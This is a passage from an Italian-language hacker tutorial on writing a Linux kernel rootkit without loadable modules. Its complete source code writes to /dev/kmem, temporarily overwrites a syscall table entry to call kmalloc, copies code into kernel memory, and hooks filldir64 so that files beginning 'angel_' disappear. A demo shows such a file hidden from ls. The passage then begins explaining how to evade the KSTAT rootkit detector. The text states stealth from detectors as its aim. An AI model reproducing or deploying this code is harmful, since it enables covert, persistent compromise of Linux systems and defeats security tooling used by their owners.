[dal manuale di gcc]

Non potremo nemmeno usare funzioni che richiedano linking, percio` scordatevi
le librerie "normali" :-)
Dovremo produrre una massa di codice perfettamente funzionante "cosi` com'e`".

Dovremo inoltre trovare un modo di allocare della memoria a kernel space ed
uno per "attivare" una funzione kernel space, il tutto restando ad userspace.
 
Un'iniziale scaletta del nostro procedimento potrebbe essere questa:

- Crea la massa di codice.
- Alloca memoria a kernel space.
- Copia il codice nella memoria precedentemente allocata.
- Avvia la funzione di init del nostro programma (l'equivalente
  dell'init_module in sostanza).

- ALCUNE PRECISAZIONI

Quando ho detto che non avremmo potuto utilizzare variabili globali e
stringhe... in parte ho mentito :P
Non potremo utilizzarle nel modo "normale" in cui siamo abituati a farlo, ma
e` possibile creare delle variabili accessibili ovunque (percio` come se
fossero globali), ma che non necessitano di rilocazione, o meglio,
autorilocanti: sara` la variabile stessa a fornirci il suo indirizzo.
Ho mentito anche quando dicevo che non avremmo potuto usare simboli del
kernel... diciamo che non e` possibile utilizzarli nella maniera consueta, ma
anche qui con qualche trucchetto ce la possiamo cavare.

- VARIABILI GLOBALI

Veniamo alle variabili autorilocanti. Il trucco e' molto semplice,
trasformeremo la nostra variabile in una funzione che una volta chiamata ci
restituisca un puntatore ad una zona di memoria contenente il suo valore.
Ok, forse non e` proprio cosi` semplice da dire a parole, vediamo percio`
qualche frammento di codice che ci aiuti a capire meglio.

Analizziamo questo pseudocodice assembly:

	       call ETICHETTA1  <--- Punto di partenza
	       ...
	       ...
	       ...
 ETICHETTA2:   pop eax
 	       ret
 ETICHETTA1:   call ETICHETTA2
	       .stringa "Ciao mondo"

Passo 1: il programma va ad eseguire il jump che sposta l'esecuzione del
         programma ad ETICHETTA1.
Passo 2: viene eseguita la call, questo fa` si` che l'esecuzione del programma
         si sposti ad etichetta 2 e l'indirizzo di ritorno (ovvero dove
         dovrebbe riprendere l'esecuzione del programma una volta finita la
         call) venga salvato nello stack.
Passo 3: il valore in cima allo stack (ovvero l'indirizzo di ritorno della
         call) viene messo nel registro eax.
Passo 4: viene eseguita la ret, la call finisce ed abbiamo il suo indirizzo di
         ritorno in eax.

Ma a cosa ci serve l'indirizzo di ritorno della call? Come potete vedere
quello che c'e` dopo la call e` la stringa "Ciao mondo", percio` in eax avremo
salvato l'indirizzo di questa stringa.
Noi e` proprio in questo modo che opereremo, al posto di "Ciao mondo" ci sara`
la zona di memoria contenente il valore della nostra variabile, ovunque esso
sia senza bisogno di rilocazione.
Creeremo una struttura dove ogni suo campo e` un componente dell'algoritmo
spiegato (call,pop e valore) poi la convertiremo in funzione tramite cast ed
infine la chiameremo (i bytes sono tutti "in fila" in memoria, percio`
funziona :)

<-| LKEPD/autoreloc.c |->
#define RELOC(tipo, quante, nome, valori...) \
          struct s_##nome {       \
	          /* Opcode e parametri della call
                   */
	          unsigned char   opcodes[5];  \
                  /* Ci dice quanto dobbiamo saltare: in questo caso il ret ed
                     il pop eax sono messi dopo la call:
                          call etichetta;
                          valori
                     etichetta:pop
                          ret
                     Come potete vedere il risultato e` lo stesso, dovremo
                     saltare in avanti di n bytes, dove n e` il numero delle
                     variabili memorizzate per la loro dimensione
                   */
		  tipo    dimensione[quante];  \
		  /* Gli opcodes del pop e del ret
		   */
		  unsigned char   opcodes2[2]; \
          } __attribute__((packed)); \
          static struct s_##nome f_##nome = \
	  /*  nell'ordine:
	      opcode della call con spiazzamento a 32 bit
	      primi 8 bit della dimensione del salto
	      secondi 8 bit della dimensione del salto
	      terzi 8 bit della dimensione del salto
	      ultimi 8 bit della dimensione del salto
	   */
              {{0xe8, sizeof(f_##nome.dimensione) & 0xff,\
	      (sizeof(f_##nome.dimensione) >> 8) & 0xff,\
	      (sizeof(f_##nome.dimensione) >> 16) & 0xff,\
	      (sizeof(f_##nome.dimensione) >> 24) & 0xff  },\
	      /* Valori contenuti nelle/a variabili/e */
              {valori},                  \
	      /* pop eax
	         ret
	       */
              {0x58, 0xc3}\
          };          \
          static inline tipo *nome(void) \
          {                       \
	  /* Castiamo a funzione la struttura appena creata e la eseguiamo */
               tipo *(*func)() = (void *) &f_##nome; \
               return func();  \
          }

#define R_VAR(tipo, nome, valori)   \
        RELOC(tipo, 1, nome, valori)

R_VAR(int,pippo,123456);

int main(void)
{
    printf("%d\n",*(pippo()));
    return 0;
}
<-X->

 Vortex:~# gcc autoreloc.c -o autoreloc
 Vortex:~# ./autoreloc
 123456
 Vortex:~#

- UTILIZZARE LE FUNZIONI DEL KERNEL

State tranquilli, questo e` molto meno laborioso, e` un semplice gioco di
puntatori :) Mettiamo di voler utilizzare la printk per stampare un messaggio
di debug, tutto quello di cui abbiamo bisogno e`:

- L'indirizzo della stringa da stampare <= Lo troviamo tramite una variabile
                                           autorilocante
- L'indirizzo della printk <= Lo troviamo tramite parsing o System.map
- 4 bytes a kernel space <= Vedremo dopo come ottenerli, ora ipotizziamo di
                            avere una variabile autorilocante che restituisca
			    un puntatore a questi 4 bytes

La sintassi e` semplice:

int (**printk)(char*,...);
printk=(void*)(unsigned long)*my_bytes(); <= Ora *printk punta ai nostri bytes
*printk=(void*)PRINTK_ADDRESS; <= Scriviamo l'indirizzo della printk
(**printk)(print_string()); <= Chiamiamo la funzione il cui indirizzo e` sui
                               nostri bytes
 
- CREARE IL CODICE

Ora vedremo come creare la massa di codice eseguibile senza "troppi" problemi.
Al fine di facilitare la comprensione della tecnica non andremo a lavorare
subito col kernel, ma implementeremo un semplice programma che scriva "Ciao"
sullo schermo.
Il primo problema e` come dire alla macchina che deve scrivere qualcosa: non
possiamo usare librerie, percio` dobbiamo trovare un sistema per dire
direttamente al kernel che syscall vogliamo eseguire e con che parametri. Se
vi ricordate abbiamo gia` visto come fare nella parte sull'IDT, basta mettere
i valori corretti nei registri e chiamare l'int 0x80. Il kernel stesso ci mette
a disposizione delle macro per fare questo, non sara` necessario studiarsi la
struttura di tutte le syscall che vorremo utilizzare :) Le trovate in unistd.h
nei sorgenti del kernel.
Guardiamo quella che ci interessa, quella relativa alla sys_write:

#define __NR_write              4 <---- Numero della syscall

#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
    : "=a" (__res) \
    La linea seguente posiziona gli argomenti nei registri corretti:
    : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)),
                                                        "d" ((long)(arg3))); \
    return(type) (__res); \ <--- Nel kernel a questo punto viene chiamata
                                 un'altra macro per effettuare un controllo
				 sul valore ritornato, l'ho rimossa per
				 semplicita`, ma e` equivalente.
}

static inline _syscall3(int,write,int, fd,const char *,ptr,long,size);
 
Come vedete basta sapere il numero degli argomenti della syscall che ci
interessa ed il suo numero per utilizzare la macro corrispondente. A questo
punto la nostra chiamata write(x,y,z) e` perfettamente equivalente a quella
che usiamo di solito.
Veniamo alla stringa da stampare, "Ciao", ovviamente dovra` essere
autorilocante, ma abbiamo gia` visto prima come fare: sara` sufficiente dirgli
che e` una variabile di tipo char di dimensione sizeof("Ciao").

 #define S_VAR(nome, valori) \
         RELOC(char ,sizeof(valori),nome,valori)

Vediamo dunque il codice nella sua versione finale:

<-| LKEPD/data.c |->
#define __NR_write              4
  
asm(".globl code_start\n\t" ".globl code_end\n\t");
/* Vedremo dopo il significato di questa parte in asm, per ora non badateci */
 
#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
                   : "=a" (__res) \
                   : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)),
                                                        "d" ((long)(arg3))); \
                   return(type) (__res); \
}
						        
static inline _syscall3(int,write,int, fd,const char *,ptr,long,size);
							 
							  
#define RELOC(tipo, quante, nome, valori...) \
        struct s_##nome {       \
                     unsigned char   opcodes[5];\
                     tipo    dimensione[quante]; \
                     unsigned char   opcodes2[2];   \
        } __attribute__((packed)); \
        static struct s_##nome f_##nome = \
                      {{0xe8, sizeof(f_##nome.dimensione) & 0xff,\
                       (sizeof(f_##nome.dimensione) >> 8) & 0xff,\
                       (sizeof(f_##nome.dimensione) >> 16) & 0xff,\
                       (sizeof(f_##nome.dimensione) >> 24) & 0xff  },\
                       {valori},                  \
                       {0x58, 0xc3}\
        };          \
        static inline tipo *nome(void) \
        {                       \
                      tipo *(*func)() = (void *) &f_##nome; \
	              return func();  \
	}
#define S_VAR(nome, valori) \
        RELOC(char ,sizeof(valori),nome,valori)
 
S_VAR(pippo,"ciao\n");


int init(void) {
      write(1,pippo(),5);
}
<-X->

Adesso compiliamo senza assemblare e guardiamo il codice che viene prodotto:
 
 Vortex:~# gcc -nostdlib -c -O3 data.c -S -o data.s
 Vortex:~# cat data.s
	 .file   "data.c"
 #APP
         .globl code_start
         .globl code_end
 #NO_APP
         .data
         .type   f_pippo, @object
         .size   f_pippo, 13
 f_pippo:
         .byte   -24
         .byte   6
         .byte   0
         .byte   0
         .byte   0
         .string "ciao\n"
         .byte   88
         .byte   -61
         .text
         .p2align 4,,15
 .globl init
         .type   init, @function
 init:
         pushl   %ebp
         movl    %esp, %ebp
         subl    $8, %esp
         movl    %ebx, -4(%ebp)
         movl    $1, %ebx
         call    f_pippo
         movl    %eax, %ecx
         movl    $5, %edx
         movl    $4, %eax
 #APP
         int $0x80
 #NO_APP
         movl    -4(%ebp), %ebx
         movl    %ebp, %esp
         popl    %ebp
         ret
         .size   init, .-init
         .section        .note.GNU-stack,"",@progbits
         .ident  "GCC: (GNU) 3.3.3 (Debian)"
 
No tranquilli, non serve andare ad analizzare tutto questo, dobbiamo solo
modificarlo un po' andando a rimuovere zone che non ci servono a niente e
raggruppando tutto il codice in un solo segmento. 
Agiremo in questo modo:
 
- Inseriremo un tag .data o .text in cima al file.
- Inseriremo un'etichetta code_start subito dopo (vedremo in seguito il
  perche`).
- Rimuoveremo tutte le rige inutili (cioe` non strettamente necessarie al
  programma per funzionare).
- Inseriremo un'etichetta code_end sul fondo (idem come sopra).

Per fortuna e` possibile automatizzare questo passo tramite l'utilizzo di
grep. Ecco un piccolo script che fa` quanto detto:

<-| LKEPD/data.sh |->
#!/bin/bash
echo ".text" > data.s
echo "code_start:" >> data.s
gcc -S -O3 -nostdlib data.c -o - | \ grep -vE \
"\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version|\.note" \
>> data.s
echo "code_end:" >> data.s
gcc -c data.s -o data.o
<-X->

Ecco fatto, proviamo a vederne il dump:

 data.o:     file format elf32-i386
  
  Disassembly of section .text:
   
	00000000 <code_start>:
	   0:   e8 06 00 00 00          call   b <code_start+0xb>
	   5:   63 69 61                arpl   %bp,0x61(%ecx)
           8:   6f                      outsl  %ds:(%esi),(%dx)
	   9:   0a 00                   or     (%eax),%al
	   b:   58                      pop    %eax
	   c:   c3                      ret
	   d:   8d 76 00                lea    0x0(%esi),%esi
	      
	00000010 <init>:
          10:   55                      push   %ebp
	  11:   ba 01 00 00 00          mov    $0x1,%edx
          16:   89 e5                   mov    %esp,%ebp
	  .....
	  ....
	  ..
	  .
			    
Tutto nello stesso segmento :)
 
- CARICARE IN MEMORIA IL CODICE

Dobbiamo in primo luogo trovare come allocare della memoria senza la famiglia
di funzioni *alloc.
Una loro reimplementazione e` fuori discussione, troppo laboriosa, possiamo
invece utilizzare un'altra funzione al nostro scopo, la mmap. Possiamo
chiedere al sistema di mmapparci tot bytes con permessi di
lettura/scrittura/esecuzione dove copieremo ed andremo ad eseguire il codice
realizzato poco fa.
Dobbiamo scoprire ancora 2 cose:

1) Dove si trova il codice che vogliamo caricare in memoria.
2) Quanto e` grande.

Ora entrano in gioco le etichette apparentemente senza senso che abbiamo
inserito nel file poco fa all'inizio ed alla fine del segmento in cui abbiamo
raggruppato il nostro codice: se noi nel programma che si occupa di caricare
il codice dichiariamo due funzioni come extern in questo modo

 extern void code_start();
 extern void code_end();

poi compiliamo come codice oggetto e lo linkiamo al file data.o l'effetto
sara` di associare quelle funzioni alle etichette precedentemente dichiarate.
A questo punto il gioco e` fatto: se noi utilizziamo semplicemente il nome di
queste funzioni (senza chiamarle) l'effetto sara` di avere il loro indirizzo
che corrisponde con l'inizio e la fine del codice da inserire :)
Percio` il codice sara` grande:
 (unsigned long)code_end - (unsigned long)code_start
ed iniziera` alla posizione (unsigned long)code_start . 

<-| LKEPD/charge.c |-> 
#define __NR_mmap              90
#define __NR_old_mmap          __NR_mmap

#define PROT_READ       0x1
#define PROT_WRITE      0x2
#define PROT_EXEC       0x4
#define MAP_PRIVATE     0x02
#define MAP_ANONYMOUS   0x20

extern void code_start();
extern void code_end();
extern void init(void); /* Anche la funzione di init aveva un'etichetta che
                           verra' associata a questa funzione, la chiameremo
			   per farla partire
			 */
/* Struttura utilizzata come argomento della mmap */
struct mmap_arg_struct {
        unsigned long addr;
        unsigned long len;
        unsigned long prot;
        unsigned long flags;
        unsigned long fd;
        unsigned long offset;
};


#define _syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
	long __res; \
		__asm__ volatile ("int $0x80" \
  			          : "=a" (__res) \
				  : "0" (__NR_##name),"b" ((long)(arg1))); \
		return(type) (__res); \
}


static inline _syscall1(void*,old_mmap,struct mmap_arg_struct *, ptr);

static inline void * malloc(unsigned long size) {
     struct mmap_arg_struct arg= {0,size,PROT_EXEC|PROT_READ|PROT_WRITE,
                                              MAP_PRIVATE|MAP_ANONYMOUS,0,0 };
     return old_mmap(&arg);
 }

void my_memcpy(char *to,char *from,int size)
{
	int i;
	for(i=0;i<size;i++)
		*to++=*from++;
}


int main(void)
{
   /* Allochiamo */	
   char *ptr=(char*)malloc((unsigned long)code_end-(unsigned long)code_start);

   /* Copiamo */
   my_memcpy(ptr,(char*)code_start,
                             (unsigned long)code_end-(unsigned long)code_start);

   /* Attiviamo */
   init();
   return 0;
}
<-X->

 Vortex:~# gcc -c -O3 -nostdlib charge.c -o charge.o
 Vortex:~# gcc data.o charge.o -o charge
 Vortex:~# ./charge
 ciao
 Vortex:~#

L'unica differenza tra questo e lavorare con kmem sara` dove andremo a
scrivere :)
Qui e` bastata una mmap per allocare spazio, mentre per ottenere memoria a
kernel space dobbiamo necessariamente chiamare la kmalloc. Ora vedremo come.


SEZIONE VII
===========

- ALLOCAZIONE DI MEMORIA ED ATTIVAZIONE FUNZIONI A KERNEL SPACE

Contrariamente a quanto si possa pensare allocare memoria a kernel space e`
piuttosto facile dato che abbiamo bisogno solo di 3 cose:

- L'indirizzo della kmalloc => Lo otteniamo tramite parsing/System.map
- Il valore di GFP_KERNEL   => Lo otteniamo tramite parsing o tenendone un
                               elenco con le rispettive versioni del kernel

- Un modo di comunicare con kernelspace da userspace per passare i parametri
alla kmalloc e ricevere l'indirizzo della memoria allocata

Pensate un attimo, l'ultimo punto non vi sa di dejavu? Noi abbiamo gia un
sistema che ci permette di comunicare valori/eseguire operazioni/ottenere un
risultato con il kernel... le sys call :)
Non dovremo fare altro che sovrascrivere l'indirizzo di una syscall con almeno
2 parametri con quello della kmalloc, chiamarla salvando il risultato e
ripristinare l'indirizzo originario. A questo punto abbiamo l'indirizzo della
zona di memoria allocata, percio` possiamo andare a copiare in quella memoria
il nostro codice. Per "attivare" la funzione di init non dovremo fare altro
che utilizzare la tecnica di prima sovrascrivendo l'indirizzo di una syscall
con l'indirizzo del nostro init e poi chiamarlo. Semplice vero? :)

- L'IMPLEMENTAZIONE

Normalmente questa tecnica e` usata in concomitanza con l'hijacking della sys
call table dato che e` un sistema semplice, pulito e dagli ottimi risultati,
ma e` altresi` vero che ormai un hook simile e` facilmente rilevabile da un
qualsiasi detector di rootkit. Ora come ora, penso che l'unico sistema per
rimanere occultati a lungo sia quello di iniziare a giocare con le funzioni
del virtual file system di linux (sarebe una cosa tipo quello che abbiamo
fatto con /proc ) dato che non si sa il perche` nessuno le controlla, oppure
andare a lavorare con le funzioni interne del kernel.
Non ho mai visto implementazioni di nessuno di questi 2 sistemi, ma dato che
il secondo e` un po' piu` complesso come realizzazione ed offre un
occultamento estremamante elevato se usato intelligentemente vedremo un
esempio di questo. Chiaramente il discorso che ho fatto all'inizio,
occultamento VS portabilita` e` ancora valido: sta a voi scegliere come e dove
operare.

Ovviamente non implementeremo tutti gli occultamenti visti fin'ora con questa
tecnica, mostero` solo un esempio di hook alla filldir64. Questa e` una
funzione interna alla getdents64 (per cui difficilmente controllata) il cui
compito (a grandi linee) puo' essere definito come il "riempire" il buffer di
output della getdents.
Daremo per scontato di conoscerne l'indirizzo (e` facilmente ottenibile
tramite parsing) e daremo per noti anche gli indirizzi della sys call table,
della kmalloc ed il valore di GFP_KERNEL.

- STRUTTURA

Lo schema generale degli hook rimarra` il medesimo: filtraggio dell'input
prima di eseguire la chiamata oppure dopo averla eseguita. Per questo motivo
necessitiamo di memorizzare nella memoria allocata anche alcune informazioni
tipo i bytes di backup.

struct hook
{
        char inject[7];
        char backup[7];
        char *pointer;
}__attribute__((packed));

Un nostro hook sara` rappresentato dalla struttura qui sopra, i primi 7 bytes
sono riservati per memorizzare il codice di injecting, gli altri 7
memorizzeranno i bytes che andremo a sovrascrivere mentre il puntatore finale
servira` come puntatore "base" per poter chiamare la funzione del kernel
corrispondente all'hook (se non vi e` chiaro non importa, capirete dopo
guardando il codice)

struct pointer {
  	char *ptr;
}__attribute__((packed));
 
Ognuna di queste strutture rappresenta una funzione del kernel (esterna ad un
hook) che andremo ad utilizzare. Questa soluzione e` ben lungi dall'essere
ottimizzata, ma mi sembra che cosi` facendo, separando i dati, ci sia una
maggior chiarezza concettuale.

Dopo che avremo allocato la memoria kernel dovremo creare questo schema:

  |  structs hook  | structs pointer |  codice delle funzioni  |
  |________________|_________________|_________________________|
 Inizio	Memoria						   Fine Memoria

Possiamo allocare qualsiasi numero di strutture hook/pointer, bisogna solo
tenere conto di quante per calcolare in seguito gli spiazzamenti del codice.

<-| LKEPD/eclipse.h |->
/* File di include, eclipse.h */

/* Definizione dei numeri delle syscall che utilizzeremo */
 
#define __NR_m_exit     1
#define __NR_read       3
#define __NR_write      4
#define __NR_open       5
#define __NR_lseek      19
#define __NR_olduname   59
#define __NR_KMALLOC    __NR_olduname /* Chiameremo la olduname prima per
                                         allocare poi per attivare */
#define __NR_KSTART     __NR_olduname

#define SEEK_SET        0
#define S_IRWXU         00700
#define O_RDWR          02
#define GFP_KERNEL      0x1f0  /* Se il kernel e` un 2.4 dovrebbe andare bene
                                  questo, comunque controllate */
#define NULL            (void*)0

#define A_KMALLOC       Inserite /* Indirizzo kmalloc */
#define A_SCT           i vostri /* Indirizzo sys call table */
#define FILLDIR64 	 valori  /* Indirizzo filldir64 */
#define HOOKS           1 /* Significa che andremo ad agganciare solo 1
                             funzione */
#define POINTERS        0 /* Non useremo puntatori sciolti, percio` 0 */

extern void code_start();
extern void code_end();


#define _syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
long __res; \
  __asm__ volatile ("int $0x80" \
                     : "=a" (__res) \
                     : "0" (__NR_##name),"b" ((long)(arg1))); \
                   return(type)(__res); \
}

#define _syscall2(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
 long __res; \
  __asm__ volatile ("int $0x80" \
                    : "=a" (__res) \
                    : "0" (__NR_##name),"b" ((long)(arg1)),
                                                        "c" ((long)(arg2))); \
                    return(type) (__res); \
}
 
#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
 long __res; \
 __asm__ volatile ("int $0x80" \
                   : "=a" (__res) \
                   : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)),
		                                        "d" ((long)(arg3))); \
                   return(type) (__res); \
 }

static inline _syscall3(int,write,unsigned int, fd,const char *,ptr,long,size);
static inline _syscall3(int,read,unsigned int, fd, char *, ptr,long, size);
static inline _syscall3(long,lseek,unsigned int,fd,int,offset,int, modo);
static inline _syscall3(int,open,char *, sptr, int, modo,int, permessi);
static inline _syscall2(unsigned long,KMALLOC,unsigned long,size,
                                                           unsigned int,gfp);
static inline _syscall2(unsigned long ,KSTART,unsigned long, mem,
                                                           unsigned long, sct);
static inline _syscall1(void,m_exit,int,status);

struct hook
{
         unsigned char inj_code[7];
         unsigned char backup[7];
         /* Puntatore a kspace da utilizzare come base per chiamare la
          * funzione originaria
          */
         unsigned char *base_ptr;
}__attribute__((packed));
     
struct pointer
{
      char *ptr;
}__attribute__((packed));

/* Legge dal file descriptor fd alla posizione offset size bytes e li mette in
   buf */

static inline int rkm(int fd, int offset, void *buf, int size)
{
    if (lseek(fd, offset, 0) != offset)
                return 0;
    if (read(fd, buf, size) != size)
                return 0;
    return size;
}

/* Scrive  sul file descriptor fd alla posizione offset size bytes dal buffer
   buf */

static inline int wkm(int fd, int offset, void *buf, int size)
{
    if (lseek(fd, offset, 0) != offset)
                return 0;
    if (write(fd, buf, size) != size)
                return 0;
    return size;
}

void m_memcpy(char *to,char *from, unsigned int size)
{
        int i;
        for(i=0;i<size;i++)
             *to++=*from++;
}

int my_strlen(char *string)
{
         int len=0;
         while(*string!='\0')
         {
                len++;
                 string++;
         }
         return len;
}

int my_strncmp(char *string1,char *string2,int size)
{
         int i;
         for(i=0;i<size;i++,string1++,string2++)
                if(*string1!=*string2)
                      return 1;
         return 0;
}

#define RELOC(tipo, quante, nome, valori...) \
          struct s_##nome {       \
                 unsigned char   opcodes[5];\
                 tipo    dimensione[quante]; \
                 unsigned char   opcodes2[2];   \
          } __attribute__((packed)); \
          static struct s_##nome f_##nome = \
                 {{0xe8, sizeof(f_##nome.dimensione) & 0xff,\
                  (sizeof(f_##nome.dimensione) >> 8) & 0xff,\
                  (sizeof(f_##nome.dimensione) >> 16) & 0xff,\
                  (sizeof(f_##nome.dimensione) >> 24) & 0xff  },\
                  {valori},                  \
                  {0x58, 0xc3}\
          };          \
          static inline tipo *nome(void) \
          {                       \
                  tipo *(*func)() = (void *) &f_##nome; \
                  return func();  \
          }
#define R_VAR(tipo, nome, valori)   \
        RELOC(tipo, 1, nome, valori)
 
#define S_VAR(nome, valori) \
        RELOC(char ,sizeof(valori),nome,valori)

/* Saranno nascosti tutti i file inizianti con la sottostringa "angel_" */
 S_VAR(hide,"angel_");
<-X->

Non penso ci siano bisogno ulteriori commenti.
Ora il codice del "loader" in memoria

<-| LKEPD/charger.c |->
/* charger.c */

#include "eclipse.h"
 
extern void init(unsigned long,unsigned long); /* Ovvero la funzione di init
                                                  di data.c */

S_VAR(skmem,"/dev/kmem");
S_VAR(error,"Uops, errore :(\n");
#define ERROR   { write(1,error(),16);m_exit(-1);}
/* Read and check error */
#define R_C_E(fd,offset,dove,quanto)   if(rkm(fd,offset,dove,quanto)<0) ERROR
/* Write and check error */
#define W_C_E(fd,offset,dove,quanto)   if(wkm(fd,offset,dove,quanto)<0) ERROR

int main(void);
void _start(void){ main(); m_exit(0); };
 
int main(void)
{
       int kmem = open(skmem(),O_RDWR,S_IRWXU);
       unsigned long uname_addr,
	              kmalloc=A_KMALLOC,
	              kernel_mem,
	              hooksizes=(HOOKS*sizeof(struct hook))+
		                   (sizeof(struct pointer)*POINTERS),
	              start_addr;
	if(kmem<0)
	     ERROR
	
        /* Leggiamo e salviamo l'indirizzo originale della olduname */
	R_C_E(kmem,A_SCT+(__NR_olduname*4),&uname_addr,sizeof(uname_addr))
	
	/* Lo sovrascriviamo con quello della kmalloc */
	W_C_E(kmem,A_SCT+(__NR_olduname*4),&kmalloc,sizeof(kmalloc))
        
	/* Allochiamo */
	kernel_mem=KMALLOC((unsigned long)code_end-(unsigned long)code_start+
       	                                                hooksizes,GFP_KERNEL);
        
	if((void*)kernel_mem==NULL)
	     ERROR
        /* Copiamo il nostro codice in memoria */
        W_C_E(kmem,kernel_mem+hooksizes,(char*)code_start,
	                     (unsigned long)code_end-(unsigned long)code_start)
	
        /* Calcoliamo l'indirizzo dell'init */
        start_addr=kernel_mem+hooksizes+(unsigned long)init-
	                                            (unsigned long)code_start;

 	/* Scriviamo l'indirizzo dell'init al posto della syscall */
	W_C_E(kmem,A_SCT+(__NR_olduname*4),&start_addr,sizeof(start_addr))
        
	/* Attiviamo la routine kernel space */
        KSTART(kernel_mem,A_SCT);
        
	/* Ripristinamo il vecchio indirizzo nella sys call table */
	W_C_E(kmem,A_SCT+(__NR_olduname*4),&uname_addr,sizeof(uname_addr))
        
	/* Abbiamo finito, usciamo */
	m_exit(0);
} 
<-X->

Ed infine il codice che andra` a risiedere nella memoria kernel

<-| LKEPD/eclipse.c |->
#include "eclipse.h"
 
asm (".globl code_start\n\t" ".globl code_end\n\t");

/* Faremo puntare questi puntatori rispettivamente alla zona di memoria
   dedicata all'injection ed a quella dedicata al backup, cosi` da potervici
   accedere da qualsiasi funzione
 */
R_VAR(unsigned long *, backup_fill, 0);
R_VAR(unsigned long *, inj_code_fill, 0);

int n_filldir64(void *buf,char *nome,int length,unsigned long off,long inode,
                   unsigned int tipo)
{
   int   len = 0;
   int   (**o_filldir) (void *, char *, int, unsigned long,long,unsigned int);
       
   /* Ora con *filldir si accede al puntatore "base" della struttura hook */
   (o_filldir) = (void *) (7 + (unsigned long) *backup_fill());
       
   /* Facciamo puntare quel puntatore alla filldir64 oroginaria */
   (*o_filldir) = (void *) FILLDIR64;
      
   /* Se il nome del file con cui e` stata chiamata la filldir deve essere
      nascosto ritorniamo 0 altrimenti chiamiamo la funzione originaria
    */
   if (!my_strncmp(nome, hide(), my_strlen(hide())))
          return 0;

   /* Ripristiniamo i bytes originari per poterla chiamare */
   m_memcpy((char *) FILLDIR64,(char*) *backup_fill(), 7);

   len = (**o_filldir) (buf, nome, length, off, inode, tipo);

   /* Risistemiamo l'hook */
   m_memcpy((char *) FILLDIR64, (char*)*inj_code_fill(), 7);

   return len;
}

void init(unsigned long base_mem,unsigned long sct) {

unsigned char inj_fill[7] = "\xb8\x00\x00\x00\x00\xff\xe0";
unsigned char b_fill[7];

 /*  Faccio puntare i 2 puntatori alle rispettive zone della struttura hook */
 
  *inj_code_fill()=(void*)+base_mem;
  *backup_fill()=(void*)+7+base_mem;
 
 /* Ricordiamoci che davanti al nostro codice ci sono le strutture per gli
    hook */

  *(unsigned long*)&inj_fill[1]=(unsigned long)n_filldir64-
                  (unsigned long)code_start+base_mem+sizeof(struct hook)*HOOKS+
		  sizeof(struct pointer)*POINTERS;
				 
/* Sistemiamo il codice per l'injection ed il backup nella struttura */
   m_memcpy((char*)*inj_code_fill(),inj_fill,7);
   m_memcpy((char*)*backup_fill(),(char*)FILLDIR64,7);
 
/* Injectiamo il codice di salto */
   m_memcpy((char*)FILLDIR64,inj_fill,7);
}
<-X->

Finito :)

Compiliamo con questo...

<-| LKEPD/eclipse.sh |->
#!/bin/bash
echo ".text" > eclipse.s
echo "code_start:" >> ecplipse.s
gcc -S -nostdlib -O2 eclipse.c -o - | grep -vE \
"\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version|\.note" \
>> eclipse.s
echo "code_end:" >> eclipse.s
gcc -nostdlib -c eclipse.s -o eclipse.o
gcc -c -nostdlib -O3 charger.c -o charger.o
gcc charger.o eclipse.o -o eclipse
 
Vortex:~# ./eclipse
Vortex:~# touch angel_dust
Vortex:~# ls | grep angel_dust
Vortex:~#

Come avete visto la sua struttura e` parecchio flessibile, potete divertirvi ad
espanderlo finche volete, anche se, chiaramente, ci sono modi molto piu`
immediati di procedere, sta a voi la scelta :)


SEZIONE VIII
============

- VIRTUAL FILE SYSTEM 

Il virtual file system e` un layer del kernel che si occupa di gestire tutte
le syscall legate ad un filesystem.
Il VFS consente di gestire gli accessi agli inode, astraendo dal tipo di
filesystem su cui l'inode risiede ed indipendentemente dal tipo di file, sia
esso socket, device, ascii od altro. Questo e` ottenuto mediante la creazione
di un modello comune di file rappresentato da una struct file nella quale, tra
le altre cose, vengono memorizzate dal kernel le informazioni riguardo alle
funzioni che devono essere utilizzate per lavorare col filesystem sul quale il
file in esame risiede.
Cio` fa si` che quando ad esempio noi compiamo una qualsiasi operazione su un
file utilizzando le syscall, il kernel individui automaticamente quali sono le
funzioni reali da chiamare, dandoci l'illusione che sia la syscall "pura" a
sobbarcarsi tutto il lavoro, lasciandoci cosi` una comoda interfaccia per
lavorare con qualsiasi tipo di filesystem.
Chiaramente noi non vedremo tutta la struttura del virtual file system di
linux, lo esamineremo solo quel tanto che basta per poterne abusare. [1]
In realta` abbiamo gia` visto un esempio di modifica del VFS, ovvero quando
abbiamo parlato di proc, ma ora estendermo questo discorso anche agli altri
filesystems.
Ora dovremo andare ad intercettare le funzioni che il kernel utilizza per
lavorare con un file su un certo filesystem, e lo faremo andando a modificare
i puntatori a funzione che sono memorizzati all'interno della struct file. 

- COME BYPASSARE I SECURITY TOOL BASATI SULL'ANALISI DI FILES (KMEM)

Fino ad ora vi ho mostrato come attaccare un sistema nei modi piu svariati, ma
ora vedremo un'applicazione di un hack al VFS per la nostra autodifesa: come
bypassare KSTAT. [2]
Mettiamo di aver creato un modulo che hijacka la sys_call_table, uno come
quello che vi ho mostrato in una delle sezioni precedenti, vediamo come
nascondere questo hijack agli occhi di KSTAT.
Innanzitutto guardiamo come lavora:

int check_sct()
{
        int kd;
        char sch_code[100], *buf;
        kd=open(KMEM, O_RDONLY);
        printf("\nLegal sys_call_table should be at 0x%x ...", SYS_CALL_TABLE);
        kread(kd, sc_addr, sch_code, 100);
        buf = (char *) memmem(sch_code, 100, "\xff\x14\x85", 3);
        sct = *(unsigned *)(buf+3);
        if(sct == SYS_CALL_TABLE) {
           printf(" OK!\n");
           close(kd);
           return 0;
        }
        else {
           printf(" WARNING! sys_call_table hijacked!\n\n");
